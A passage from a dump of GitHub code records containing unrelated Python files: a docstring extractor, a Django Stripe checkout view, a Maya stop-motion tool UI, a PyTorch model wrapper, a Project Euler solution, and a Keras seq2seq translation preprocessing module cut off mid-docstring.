isinstance(node, ast.FunctionDef):\n text_body = ast.get_source_segment(script, node)\n print(text_body)\n print(\"_____________________________________________________\")\n # print(node.body)\n for child in ast.iter_child_nodes(node):\n print_docstrings(child, script)\n\nwith open(\".tmp\", \"r\") as input_:\n content = input_.read()\n # docstrings = get_docstrings(input_)\n module = ast.parse(content)\n # function_definitions = [node for node in module.body if isinstance(node, ast.FunctionDef)]\n # for node in ast.iter_child_nodes(module):\n # for child in ast.iter_child_nodes(node):\n # print(child)\n # print(function_definitions)\n # print(docstrings)\n print_docstrings(module, content)\n\n\n \n","repo_name":"mmalofeev/ml_code_documentation_generation","sub_path":"docstring_extractor_test.py","file_name":"docstring_extractor_test.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"39367812127","text":"import stripe\nfrom django.shortcuts import render, redirect\nfrom .models import Item, ItemAPI\nfrom django.views import View\nfrom django.conf import settings\nfrom django.http import JsonResponse\n\n\ndef index(request):\n goods = Item.objects.all()\n data = {\n 'goods': goods,\n }\n return render(request, 'index.html', context=data)\n\n\ndef CreateCheckoutSessionView(request, *args, **kwargs):\n stripe.api_key = settings.STRIPE_SECRET_KEY\n YOUR_DOMAIN = 'http://127.0.0.1:8000'\n pk = kwargs.get('pk', None)\n good_item_id = ItemAPI.objects.get(pk=pk)\n checkout_session = stripe.checkout.Session.create(\n payment_method_types=['card'],\n line_items=[\n {\n \"price\": good_item_id.api_id,\n \"quantity\": 1,\n },\n ],\n currency='usd',\n mode='payment',\n success_url=YOUR_DOMAIN + '/success',\n cancel_url=YOUR_DOMAIN + '/cancel',\n )\n return redirect(checkout_session.url, code=303)\n\n\ndef success(request):\n return render(request, 'success.html')\n\n\ndef cancel(request):\n return render(request, 'cancel.html')\n\n\ndef goods_info(request, *args, **kwargs):\n pk = kwargs.get('pk', None)\n item = Item.objects.get(pk=pk)\n data = {\n 'good': item\n }\n return render(request, 'ptoduct_page.html', context=data)","repo_name":"mynameiszaurrr/sale_of_services_site","sub_path":"paypage/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"7585739347","text":"# Project Modules\nfrom utils import *\n\n# Qt Modules\nfrom PySide2.QtCore import *\nfrom PySide2.QtWidgets import *\nimport shiboken2 as shiboken\n\n# Maya Modules\nfrom maya import cmds, OpenMayaUI\n\nUI_NAME = 'stop_motion_UI'\nUI_TITLE = 'Stop Motion Tool'\n\n\ndef maya_to_qt(name, *args, **kwargs):\n\t\"\"\"\n\tMaya to QWidget\n\n\t:param str name: Maya name of an ui object\n\t:return: QWidget of parsed Maya name\n\t:rtype: QWidget\n\t\"\"\"\n\tptr = OpenMayaUI.MQtUtil.findControl(name)\n\tif ptr is None:\n\t\tptr = OpenMayaUI.MQtUtil.findLayout(name)\n\tif ptr is None:\n\t\tptr = OpenMayaUI.MQtUtil.findMenuItem(name)\n\tif ptr is not None:\n\t\treturn shiboken.wrapInstance(long(ptr), QWidget)\n\treturn ptr\n\n\ndef qt_to_maya(widget, *args, **kwargs):\n\t\"\"\"\n\tQWidget to Maya name\n\n\t:param QWidget widget: QWidget of a maya ui object\n\t:return: Maya name of parsed QWidget\n\t:rtype: str\n\t\"\"\"\n\treturn OpenMayaUI.MQtUtil.fullName(long(shiboken.getCppPointer(widget)[0]))\n\n\ndef 
get_maya_window(*args, **kwargs):\n\tptr = OpenMayaUI.MQtUtil.mainWindow()\n\tif ptr is not None:\n\t\treturn shiboken.wrapInstance(long(ptr), QWidget)\n\n\nclass FloatSlider(QWidget):\n\tvalueChanged = Signal(float)\n\n\tdef __init__(self, *args, **kwargs):\n\t\tQWidget.__init__(self, *args, **kwargs)\n\n\t\tself.currentValue = 0.5\n\n\t\t# Layout\n\t\tself.setLayout(QHBoxLayout())\n\n\t\t# Label\n\t\tself.label = QLabel('Ratio Control')\n\t\tself.layout().addWidget(self.label)\n\n\t\t# Float Field\n\t\tself.float_field = QDoubleSpinBox()\n\t\tself.float_field.setMinimum(0.0)\n\t\tself.float_field.setMaximum(1.0)\n\t\tself.float_field.setValue(0.5)\n\t\tself.float_field.setSingleStep(0.01)\n\t\tself.float_field.setFocusPolicy(Qt.ClickFocus)\n\t\tself.layout().addWidget(self.float_field)\n\n\t\t# Float Slider\n\t\tself.float_slider = QSlider(Qt.Horizontal)\n\t\tself.float_slider.setMinimum(0)\n\t\tself.float_slider.setMaximum(100)\n\t\tself.float_slider.setValue(50)\n\t\tself.layout().addWidget(self.float_slider)\n\n\t\t# Slots\n\t\tself.float_field.valueChanged.connect(self.field_callback)\n\t\tself.float_slider.valueChanged.connect(self.slider_callback)\n\n\tdef slider_callback(self, *args, **kwargs):\n\t\tvalue = self.float_slider.value()\n\t\tself.float_field.setValue(float(value) / 100.0)\n\t\tself.currentValue = float(value)\n\t\tself.valueChanged.emit(float(value))\n\t\treturn\n\n\tdef field_callback(self, *args, **kwargs):\n\t\tvalue = self.float_field.value()\n\t\tself.float_slider.setValue(int(value * 100.0))\n\t\tself.currentValue = float(value)\n\t\tself.valueChanged.emit(float(value))\n\t\treturn\n\n\nclass ProgressButton(QWidget):\n\tdef __init__(self, *args, **kwargs):\n\t\tQWidget.__init__(self, *args, **kwargs)\n\n\n# TODO: Preview Mode\nclass Window(QMainWindow):\n\tdef __init__(self, *args, **kwargs):\n\t\tQMainWindow.__init__(self, *args, **kwargs)\n\n\t\t# Variables\n\t\tself.progress_min = 0\n\t\tself.progress_max = 100\n\t\tself.progress_current = 0\n\n\t\t# Layout\n\t\tself.widget_main = QWidget()\n\t\tself.widget_main.setLayout(QVBoxLayout())\n\t\tself.setCentralWidget(self.widget_main)\n\t\tself.setMinimumWidth(400)\n\t\tself.setMaximumWidth(400)\n\n\t\t# Options\n\t\tself.group_options = QGroupBox('Options')\n\t\tself.group_options.setLayout(QVBoxLayout())\n\t\tself.widget_main.layout().addWidget(self.group_options)\n\n\t\t# Ratio Slider\n\t\tself.ratio_slider = FloatSlider()\n\t\tself.group_options.layout().addWidget(self.ratio_slider)\n\n\t\t# Row Layout\n\t\trowLayout = QHBoxLayout()\n\t\tself.group_options.layout().addLayout(rowLayout)\n\n\t\t# Dynamics\n\t\tself.checkbox_stepped = QCheckBox('Simulate Stepped')\n\t\tself.checkbox_stepped.setChecked(True)\n\t\trowLayout.addWidget(self.checkbox_stepped)\n\n\t\t# New Anim Layer\n\t\tself.checkbox_layer = QCheckBox('New Anim Layer')\n\t\tself.checkbox_layer.setChecked(True)\n\t\trowLayout.addWidget(self.checkbox_layer)\n\n\t\t# Dynamics\n\t\tself.checkbox_dyn = QCheckBox('Bake Dynamics')\n\t\tself.checkbox_dyn.setChecked(False)\n\t\trowLayout.addWidget(self.checkbox_dyn)\n\n\t\t# Spacer\n\t\tspacer = QSpacerItem(20, 18, QSizePolicy.Minimum, QSizePolicy.Expanding)\n\t\tself.group_options.layout().addItem(spacer)\n\n\t\t# Button\n\t\tself.button_simulate = QPushButton('Simulate')\n\t\tself.widget_main.layout().addWidget(self.button_simulate)\n\n\t\t# Progress Bar\n\t\t# self.progress_bar = QProgressBar()\n\t\t# self.progress_bar.setRange(self.progress_min, self.progress_max)\n\t\t# 
self.widget_main.layout().addWidget(self.progress_bar)\n\n\t\t# Thread\n\t\t# self.task_thread = SimulateThread()\n\n\t\t# Slots\n\t\tself.button_simulate.clicked.connect(self.simulate_callback)\n\n\t# self.task_thread.notifyProgress.connect(self.onProgress)\n\n\tdef onStart(self):\n\t\tself.task_thread.update_vars(nodes=cmds.ls(sl=True),\n\t\t\t\t\t\t\t\t\t ratio=self.ratio_slider.currentValue,\n\t\t\t\t\t\t\t\t\t is_layer=self.checkbox_layer.isChecked(),\n\t\t\t\t\t\t\t\t\t is_dynamic=self.checkbox_dyn.isChecked(),\n\t\t\t\t\t\t\t\t\t )\n\n\t\tself.task_thread.start()\n\n\tdef onProgress(self, index, *args, **kwargs):\n\t\tself.progress_bar.setValue(index)\n\t\treturn\n\n\t@undo\n\tdef simulate_callback(self, *args, **kwargs):\n\t\tis_simulate = self.checkbox_stepped.isChecked()\n\t\tis_layer = self.checkbox_layer.isChecked()\n\t\tis_dynamic = self.checkbox_dyn.isChecked()\n\t\tratio = self.ratio_slider.currentValue\n\t\ttime_range = get_time_range()\n\n\t\tselected = cmds.ls(sl=True)\n\n\t\tif not selected:\n\t\t\traise RuntimeError('Nothing Selected')\n\n\t\tlayer_name = None\n\t\tlayer_exceptions = []\n\t\trig = None\n\t\trig_names = []\n\t\tnew_items = []\n\n\t\tfor item in selected:\n\t\t\tnamespace = item.split(':')[0]\n\n\t\t\tif namespace:\n\t\t\t\trig = Apex_Rig(namespace=namespace)\n\n\t\t\t\tif rig.main_controls:\n\t\t\t\t\tfor control in rig.main_controls:\n\t\t\t\t\t\tif control not in selected:\n\t\t\t\t\t\t\tnew_items.append(control)\n\n\t\t\t\tif rig.dyn_controls:\n\t\t\t\t\tlayer_exceptions += rig.dyn_controls\n\n\t\t\t\tif hasattr(Apex_Name, namespace):\n\t\t\t\t\trig_name = getattr(Apex_Name, namespace)\n\n\t\t\t\t\tif rig_name not in rig_names:\n\t\t\t\t\t\trig_names.append(rig_name)\n\n\t\tif new_items:\n\t\t\tselected += new_items\n\n\t\tif rig_names:\n\t\t\tlayer_name = 'stopMotion_layer1'\n\t\t\tfor rig_name in rig_names:\n\t\t\t\tlayer_name = '{}_{}'.format(rig_name, layer_name)\n\n\t\t# Dynamics\n\t\tif is_dynamic and rig:\n\t\t\tif rig.dyn_joints:\n\t\t\t\trig.transfer_dyn_to_controls()\n\n\t\t# Animation Layers\n\t\tif is_layer:\n\t\t\tclean_anim_layers()\n\n\t\t\tif not layer_name:\n\t\t\t\tlayer_name = 'stoppedMotion1'\n\n\t\t\tlayer_name = create_anim_layer(layer_name)\n\n\t\t\t# Bake\n\t\t\tbake_to_layer(selected, layer_name)\n\n\t\t# Simulate\n\t\tif is_simulate:\n\t\t\tgenerate_stop_motion(selected,\n\t\t\t\t\t\t\t\t ratio=ratio,\n\t\t\t\t\t\t\t\t randomness=0.0,\n\t\t\t\t\t\t\t\t start=int(time_range[0]),\n\t\t\t\t\t\t\t\t end=int(time_range[-1]),\n\t\t\t\t\t\t\t\t layer=layer_name,\n\t\t\t\t\t\t\t\t )\n\n\t\t# Exceptions\n\t\tif is_layer and layer_exceptions:\n\t\t\tfor item in layer_exceptions:\n\t\t\t\tremove_from_anim_layer(item, layer_name)\n\t\treturn\n\n\ndef show(name=UI_NAME, title=UI_TITLE, *args, **kwargs):\n\tif cmds.window(name, exists=True):\n\t\tcmds.deleteUI(name, wnd=True)\n\n\t# Window\n\twindow = Window(get_maya_window())\n\twindow.setObjectName(name)\n\twindow.setWindowTitle(title)\n\twindow.show()\n\treturn\n","repo_name":"lazerdaze/lancer","sub_path":"anim_mancer/tools/stopMotion/ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":6859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"38529979347","text":"#Filename:\tnn.py\n#Author:\tWang Yongjie\n#Email:\t\tyongjie.wang@ntu.edu.sg\n#Date:\t\tSel 08 Des 2020 09:44:49 WIB\n\nimport torch\nimport os\nimport numpy as np\nfrom model.base_model import BaseModel\n\nclass NNModel(BaseModel):\n\n def __init__(self, 
model_path):\n\n super().__init__(model_path)\n self.load_model()\n # work in CPU mode\n self.model = self.model.cpu()\n self.model.eval()\n\n def load_model(self):\n if os.path.exists(self.model_path):\n self.model = torch.load(self.model_path)\n #self.model = torch.load(self.model_path, map_location = {\"cuda:0\":\"cuda:1\"}) \n\n def predict_ndarray(self, _input):\n \"\"\"\n _input: input numpy array\n predict: list of integer\n \"\"\"\n with torch.no_grad():\n input_tensor = torch.from_numpy(_input)\n pred = self.model(input_tensor).squeeze()\n out = torch.round(pred) \n return out.numpy().astype(np.int), pred.numpy()\n\n def predict_tensor(self, _input):\n \"\"\"\n _input: input tensor\n predict: list of tensor\n \"\"\"\n pred = self.model(_input).squeeze()\n out = torch.round(pred)\n return out, pred\n\n def gradient(self, _input):\n raise NotImplementedError\n\n","repo_name":"wangyongjie-ntu/SkylineCF","sub_path":"model/nn.py","file_name":"nn.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"11847083867","text":"#61 Cyclical figurate numbers\n\nimport sys\n\n#Triangle 4 dig\nTrilist=[]\ntri=0\nfor a in range(45,141):\n\n tri=int((a**2+a)/2)\n Trilist=Trilist+[str(tri)]\n\n\n#Square\nSqulist=[]\nsqu=0\nfor b in range(32,100):\n\n squ=b**2\n Squlist=Squlist+[str(squ)]\n\n\n#Pent\nPentlist=[]\npent=0\n\nfor c in range(26,82):\n\n pent=int((c*(3*c-1))/2)\n Pentlist=Pentlist+[str(pent)]\n\n#Hex\nHlist=[]\nhexnum=0\n\nfor d in range(23,71):\n\n hexnum=d*(2*d-1)\n Hlist=Hlist+[str(hexnum)]\n\n#Hept\n\nHeplist=[]\nhep=0\n\nfor e in range(21,64):\n\n hep=int((e*(5*e-3))/2)\n Heplist=Heplist+[str(hep)]\n\n\n#Oct\n\nOctlist=[]\noctnum=0\n\nfor f in range(19,59):\n\n octnum=f*(3*f-2)\n Octlist=Octlist+[str(octnum)]\n\nfrom itertools import permutations\n\n\n\n\nposslist=list(permutations(['0','1','2','3','4','5'])) #Only 720 possible permuations and fairly short lists, so brute force is OK!\n\npermslist=[Trilist,Squlist,Pentlist,Hlist,Heplist,Octlist]\n\nfor a in posslist:\n\n for b in permslist[int(a[0])]:\n\n for c in permslist[int(a[1])]:\n\n if b[0:2]!=c[2:4]:\n\n continue\n\n else:\n\n for d in permslist[int(a[2])]:\n\n if c[0:2]!=d[2:4]:\n\n continue\n\n else:\n\n for e in permslist[int(a[3])]:\n\n if d[0:2]!=e[2:4]:\n\n continue\n\n else:\n\n for f in permslist[int(a[4])]:\n\n if e[0:2]!=f[2:4]:\n continue\n\n else:\n\n for g in permslist[int(a[5])]:\n\n if f[0:2]==g[2:4] and g[0:2]==b[2:4]:\n\n print(int(b)+int(c)+int(d)+int(e)+int(f)+int(g))\n sys.exit()\n\n \n\n\n\n","repo_name":"TimothyVirgil/project_euler","sub_path":"Old Solutions/61_Cyclical Figurate.py","file_name":"61_Cyclical Figurate.py","file_ext":"py","file_size_in_byte":1958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"3052613133","text":"import keras\nimport numpy as np\nfrom tqdm import tqdm\nfrom nltk.tokenize import word_tokenize\n\nFRENCH_PATH = 'fra-eng/fra.txt'\nSUPPORTED_LANGUAGES = ['english', 'french']\n\nclass Language():\n \"\"\" Simple class to wrap information about a language \"\"\"\n\n def __init__(self, name, idxDict, vocabSize, maxSentLen, reverese=True):\n assert isinstance(name, str), 'name must have type str'\n assert isinstance(idxDict, dict), 'idxDict must have type dict'\n assert isinstance(vocabSize, int), 'vocbSize must have type int'\n assert isinstance(maxSentLen, int), 'maxSentLen must have type int'\n self.name = name\n 
self.idxDict = idxDict\n self.vocabSize = vocabSize\n self.maxSentLen = maxSentLen\n self.reverseIdx = None\n\n def __str__(self):\n return self.name\n\n def __repr__(self):\n return f'NAME={self.name}/VOCAB_SIZE={self.vocabSize}/MAX_LEN={self.maxSentLen}'\n\n def add_word(self, newWord):\n \"\"\" Add a new word to the vocabulary \"\"\"\n assert (newWord not in self.idxDict.keys()), f'{newWord} is already in the vocabulary'\n assert (self.vocabSize not in self.idxDict.values()), 'idx assignment error'\n self.idxDict.update({newWord : self.vocabSize})\n self.vocabSize += 1\n return True\n\n def remove_word(self, word):\n \"\"\" Remove a word from the dictionary \"\"\"\n assert (word in self.idxDict.keys()), f'{word} is not in the vocabulary'\n del self.idxDict[word]\n self.vocabSize -= 1\n return True\n\n def reverse_idx(self):\n \"\"\" Builds reverse idx mapping ids to words \"\"\"\n self.reverseIdx = {word : id for id, word in self.idxDict.items()}\n\n\ndef build_idx_dict(vocabSet):\n \"\"\" Builds dict mapping words from vocab iterable to unique id \"\"\"\n return {word : i for i, word in enumerate(vocabSet)}\n\n\ndef clean_text(text):\n \"\"\" Cleans and lower-cases text \"\"\"\n return text.strip().lower()\n\n\ndef split_and_clean_language_line(line, delimiter):\n # clean and lower line\n cleanLine = clean_text(line)\n # separate between original language and translation\n original, translation = cleanLine.split(delimiter)\n return original, translation\n\n\ndef pad_sentence_ends(sentence, startToken='START', endToken='END'):\n \"\"\" Pads raw text sentence with start and end tokens \"\"\"\n assert isinstance(sentence, str), 'sentence must have type str'\n return f'{startToken} {sentence} {endToken}'\n\n\ndef build_language_objects(filePath, featureLanguage, targetLanguage,\n delimiter='\\t', returnTrainData=True):\n \"\"\"\n Builds dicts mapping words to unique int id and finds max line length\n in each language for padding one-hot vecs\n Args:\n filePath Path to the file containing feature and\n translated text\n featureLanguage String of language for features\n targetLanguage String of language for targets\n delimiter (*optional) String of the delimiter separating\n features from targets defaults to tab\n returnTrainData Whether to return training data lists of\n token lists for each sentence in\n features and targets\n Returns:\n Language() object storing the attributes of each language\n \"\"\"\n # assertions\n assert (featureLanguage in SUPPORTED_LANGUAGES), f'{featureLanguage} is not supported'\n assert (targetLanguage in SUPPORTED_LANGUAGES), f'{targetLanguage} is not supported'\n assert isinstance(delimiter, str), 'delimiter must have type str'\n assert isinstance(returnTrainData, bool), 'returnTrainData must have type bool'\n # build set of all the words (and punctuation) in each language\n englishVocab, frenchVocab = set(), set()\n maxEnglish, maxFrench = 0, 0\n featureWords, targetWords = [], []\n with open(filePath, 'r') as translationFile:\n for i, line in enumerate(tqdm(translationFile)):\n # separate between english and french translation\n featureSent, targetSent = split_and_clean_language_line(line=line,\n delimiter=delimiter)\n # pad sentence beginnings and ends\n paddedFeatureSent = pad_sentence_ends(featureSent)\n paddedTargetSent = pad_sentence_ends(targetSent)\n # tokenize words in each language\n englishLineWords = word_tokenize(text=paddedFeatureSent,\n language=featureLanguage)\n frenchLineWords = word_tokenize(text=paddedTargetSent,\n 
language=targetLanguage)\n # update vocab sets\n for englishWord in englishLineWords:\n englishVocab.add(englishWord)\n for frenchWord in frenchLineWords:\n frenchVocab.add(frenchWord)\n # update max lengths\n maxEnglish = max(maxEnglish, len(englishLineWords))\n maxFrench = max(maxFrench, len(frenchLineWords))\n # update feature and target word lists\n featureWords.append(englishLineWords)\n targetWords.append(frenchLineWords)\n # build dict mapping each word to a unique int id\n englishIdxDict = build_idx_dict(englishVocab)\n frenchIdxDict = build_idx_dict(frenchVocab)\n # find vocab size of each language\n englishVocabSize = len(englishIdxDict)\n frenchVocabSize = len(frenchIdxDict)\n # convert language information into Language() objects\n englishObj = Language(name='english', idxDict=englishIdxDict,\n vocabSize=englishVocabSize, maxSentLen=maxEnglish)\n frenchObj = Language(name='french', idxDict=frenchIdxDict,\n vocabSize=frenchVocabSize, maxSentLen=maxFrench)\n # build reverse idx for language objects\n englishObj.reverse_idx()\n frenchObj.reverse_idx()\n # return either language objs or language objs and train data\n if not returnTrainData:\n return englishObj, frenchObj\n else:\n return englishObj, frenchObj, featureWords, targetWords\n\n\ndef encode_sentence(sentence, languageObj):\n \"\"\"\n Encodes single sentence in languageObj language. Not used during training\n preprocessing for efficiency but used during prediction.\n Args:\n sentence: Raw text of sentence\n languageObj: Language() object of sentence language\n Returns:\n Matrix of shape (maxSentLen, vocabSize) comprising one-hot encodings\n of sentence.\n \"\"\"\n # assertions\n assert isinstance(sentence, str), 'sentence must have type str'\n assert isinstance(languageObj, Language), 'languageObj must have type Language()'\n assert (languageObj.name in SUPPORTED_LANGUAGES), f'{languageObj.name} is not supported'\n # clean and tokenize the sentence\n cleanSentence = clean_text(sentence)\n sentenceTokens = word_tokenize(cleanSentence, language=languageObj.name)\n # initialize matrix\n matrixShape = (languageObj.maxSentLen, languageObj.vocabSize)\n sentenceMatrix = np.zeros(shape=matrixShape)\n for wordNum, word in enumerate(sentenceTokens):\n wordId = languageObj.idxDict[word]\n sentenceMatrix[wordNum, wordId]\n return sentenceMatrix\n\n\ndef one_hot_encode_training_data(featureWords, targetWords, featureLanguageObj,\n targetLanguageObj, sampleNum=None):\n \"\"\"\n Encodes matrix of raw unpadded feature and target words\n Args:\n featureWords: List of token lists for each original sentence\n targetWords: List of token lists for each target sentence\n featureLanguageObj: Language() object of feature language\n targetLanguageObj: Language() object of target language\n sampleNum (*optional): Maximum number of samples to encode;\n defaults to None: all will be encoded\n Returns:\n encoderFeatures: Numpy matrix of one-hot encoded words for each\n sentence padded to maxSentLen. Used to train\n encoder LSTM cell and hidden states. Shape\n is (sampleNum, featureSentLen,\n featureVocabSize)\n decoderFeatures: Numpy matrix of one-hot encoded words for each\n sentence padded to maxSentLen. Used as\n input to decoder LSTM for teacher forcing\n training speed improvement. Shape is\n (sampleNum, targetSentLen, targetVocabSize)\n\n decoderTargets: Numpy matrix of one-hot encoded words advanced\n by one time step with respect to\n decoderFeatures. 
Used as final prediction\n target for decoder LSTM (and model).\n \"\"\"\n # assertions and formatting\n if not sampleNum:\n sampleNum = (len(featureWords) + 1)\n assert isinstance(sampleNum, int), 'sampleNum mut have type int'\n assert isinstance(featureLanguageObj, Language), 'featureLanguageObj must have type Language()'\n assert isinstance(targetLanguageObj, Language), 'targetLanguageObj must have type Language()'\n # cache length of each sentence matrix in feature and target space\n featureSentLen = featureLanguageObj.maxSentLen\n targetSentLen = targetLanguageObj.maxSentLen\n # cache length of one-hot vector in feature and target space\n featureVocabSize = featureLanguageObj.vocabSize\n targetVocabSize = targetLanguageObj.vocabSize\n # tuple of shapes for encoder inputs and decoder inputs and targets\n encoderInputShape = (sampleNum, featureSentLen, featureVocabSize)\n decoderInputShape = (sampleNum, targetSentLen, targetVocabSize)\n # initialize empty 3D arrays for training data\n encoderFeatures = np.zeros(shape=encoderInputShape, dtype='int32')\n decoderFeatures = np.zeros(shape=decoderInputShape, dtype='int32')\n decoderTargets = np.zeros(shape=decoderInputShape, dtype='int32')\n # cache idx dict for each language\n featureIdxDict = featureLanguageObj.idxDict\n targetIdxDict = targetLanguageObj.idxDict\n # iterate over features and targets, building encoded arrays\n for sentNum, (featureSent, targetSent) in tqdm(enumerate(zip(featureWords,\n targetWords))):\n if sentNum >= sampleNum:\n break\n # iterate over current feature sentence building 2D matrix of one-hot\n # encoded vectors of each word\n for wordNum, word in enumerate(featureSent):\n wordId = featureIdxDict[word]\n encoderFeatures[sentNum, wordNum, wordId] = 1\n # iterate over target sentence building one-hot matrix for decoder\n # inputs for teacher forcing and targets for decoder output advanced\n # one time step into the future\n for wordNum, word in enumerate(targetSent):\n wordId = targetIdxDict[word]\n decoderFeatures[sentNum, wordNum, wordId] = 1\n # decoder target will be the same word but one time-step ahead\n if wordNum > 0:\n decoderTargets[sentNum, (wordNum - 1), wordId] = 1\n return encoderFeatures, decoderFeatures, decoderTargets\n\n\ndef id_encode_training_data(featureWords, targetWords, featureLanguageObj,\n targetLanguageObj, sampleNum=None):\n \"\"\"\n Encodes feature and target words as dense, padded matrix of word ids\n Args:\n featureWords: List of token lists for each original sentence\n targetWords: List of token lists for each target sentence\n featureLanguageObj: Language() object of feature language\n targetLanguageObj: Language() object of target language\n sampleNum (*optional): Maximum number of samples to encode;\n defaults to None: all will be encoded\n Returns:\n encoderFeatures: Numpy matrix of word ids for each word in\n sentence, padded up to maxSentLen. Used\n to train encoder LSTM cell and hidden\n states with previous Embedding layer.\n Shape is (sampleNum, featureSentLen).\n decoderFeatures: Numpy matrix of word ids for each word in\n sentence, padded up to maxSentLen. Used as\n input to decoder LSTM for teacher forcing\n training speed improvement. Shape is\n (sampleNum, targetSentLen).\n decoderTargets: Numpy matrix of one-hot encodings for each word\n in sentence, padded up to maxSentLen.\n Used as final prediction target for decoder\n LSTM (and model). Shape is (sampleNum,\n targetSentLen, vocabSize). 
It is important\n to note that decoderTargets are sparse and\n high order compared to encoderFeatures\n and decoderFeatures, as dense, softmax\n classification must be done on comprehenive\n vectors rather than low-dimensional\n encodings.\n \"\"\"\n # assertions and formatting\n if not sampleNum:\n sampleNum = (len(featureWords) + 1)\n assert isinstance(sampleNum, int), 'sampleNum mut have type int'\n assert isinstance(featureLanguageObj, Language), 'featureLanguageObj must have type Language()'\n assert isinstance(targetLanguageObj, Language), 'targetLanguageObj must have type Language()'\n # pull out length of each sentence matrix in feature and target space\n featureSentLen = featureLanguageObj.maxSentLen\n targetSentLen = targetLanguageObj.maxSentLen\n # cache idx dict for each language\n featureIdx = featureLanguageObj.idxDict\n targetIdx = targetLanguageObj.idxDict\n # pull out target vocab size\n targetVocabSize = targetLanguageObj.vocabSize\n # tuple of shapes for encoder inputs and decoder inputs and targets\n encoderInputShape = (sampleNum, featureSentLen)\n decoderInputShape = (sampleNum, targetSentLen)\n decoderTargetShape = (sampleNum, targetSentLen, targetVocabSize)\n # initialize empty arrays for training data: features 2D, targets 3D\n encoderFeatures = np.zeros(shape=encoderInputShape, dtype='int32')\n decoderFeatures = np.zeros(shape=decoderInputShape, dtype='int32')\n decoderTargets = np.zeros(shape=decoderTargetShape, dtype='int32')\n # iterate over features and targets, building dense matrix with padding\n for sentNum, (featureSent, targetSent) in tqdm(enumerate(zip(featureWords,\n targetWords))):\n for wordNum, word in enumerate(featureSent):\n wordId = featureIdx[word]\n encoderFeatures[sentNum, wordNum] = wordId\n for wordNum, word in enumerate(targetSent):\n wordId = targetIdx[word]\n decoderFeatures[sentNum, wordNum] = wordId\n # decoder target is one time-step advanced and one-hot encoded\n if wordNum > 0:\n decoderTargets[sentNum, (wordNum - 1), wordId] = 1\n return encoderFeatures, decoderFeatures, decoderTargets\n\n\n# def bert_encode_training_data(featureWords, targetWords, featureLanguageObj,\n# targetLanguageObj, sampleNum=None):\n# \"\"\"\n# Encodes feature and target words as contextual BERT-embeddings in feature\n# language for decoding and simpler model architecture.\n# Args:\n# featureWords: List of token lists for each original sentence\n# targetWords: List of token lists for each target sentence\n# featureLanguageObj: Language() object of feature language\n# targetLanguageObj: Language() object of target language\n# sampleNum (*optional): Maximum number of samples to encode;\n# defaults to None: all will be encoded\n# Returns:\n# encoder\n# \"\"\"\n# # assertions and formatting\n# if not sampleNum:\n# sampleNum = (len(featureWords) + 1)\n# assert isinstance(sampleNum, int), 'sampleNum mut have type int'\n# assert isinstance(featureLanguageObj, Language), 'featureLanguageObj must have type Language()'\n# assert isinstance(targetLanguageObj, Language), 'targetLanguageObj must have type Language()'\n# assert (featureLanguageObj.name == 'english'), f'{featureLanguageObj.name} is not supported by current BERT model'\n #\n\n\ndef build_one_hot_encoder_decoder(featureLanguageObj, targetLanguageObj,\n latentDims=300):\n \"\"\"\n Builds encoder/decoder LSTM model for training on one-hot word vectors with\n final dense layer softmax predictions of next word. Uses LSTM encoder to\n generate cell and hidden state vector to initialize decoder LSTM. 
Uses\n teacher forcing to avoid model instability and slow decoder training.\n Training on one-hot vectors across vocabSize takes a lot of compute and\n is not recommended for word level models.\n Args:\n featureLanguageObj: Language() obj for feature data\n targetLanguageObj: Language() obj for target data\n latentDims: Number of latent dimensions for encoder\n LSTM (aka. length of hidden and\n cell vector) and initial state of\n decoder LSTM.\n Returns:\n Uncompiled model of encoder/decoder LSTM.\n \"\"\"\n # cache language info from Language() objects\n featureVocabSize = featureLanguageObj.vocabSize\n targetVocabSize = targetLanguageObj.vocabSize\n ## encoder architecture ##\n # encoder takes one-hot vector of current token\n encoder_in = keras.layers.Input(shape=(featureVocabSize,), name='encoder_in')\n # LSTM builds cell vector of size latentDims from inputs\n encoder_lstm = keras.layers.LSTM(units=latentDims, return_state=True,\n name='encoder_lstm')\n encoder_outputs, hidden_state, cell_state = encoder_lstm(encoder_in)\n # pull just the hidden and cell state from the lstm\n encoder_states = [hidden_state, cell_state]\n ## decoder architecture ##\n # decoder takes one-hot vector of correct token (teach forcing)\n decoder_in = keras.layers.Input(shape=(None, targetVocabSize),\n name='decoder_in')\n # LSTM builds cell vector of size latentDims from inputs and encoder states\n decoder_lstm = keras.layers.LSTM(units=latentDims, return_sequences=True,\n return_state=True, name='decoder_lstm')\n decoder_outputs, _, _ = decoder_lstm(decoder_in,\n initial_state=encoder_states)\n # dense layer uses softmax activation for token prediction\n decoder_dense = keras.layers.Dense(units=targetVocabSize,\n activation='softmax',\n name='decoder_dense')\n decoder_outputs = decoder_dense(decoder_outputs)\n # model takes encoder and decoder inputs and predicts on decoder outputs\n model = keras.models.Model([encoder_in, decoder_in], decoder_outputs)\n return model\n\n\ndef build_embedding_encoder_decoder(featureLanguageObj, targetLanguageObj,\n latentDims=300):\n \"\"\"\n Builds encoder/decoder LSTM model for training on scalar word id with\n final dense layer softmax predictions of next word across vocabSize vector.\n Uses LSTM encoder on embeddings to generate cell and hidden state vector to\n initialize decoder LSTM. Uses teacher forcing to avoid model instability\n and slow decoder training. Embedding word ids is faster than one-hot\n for word-level models.\n Args:\n featureLanguageObj: Language() obj for feature data\n targetLanguageObj: Language() obj for target data\n latentDims: Number of latent dimensions for encoder\n LSTM (aka. 
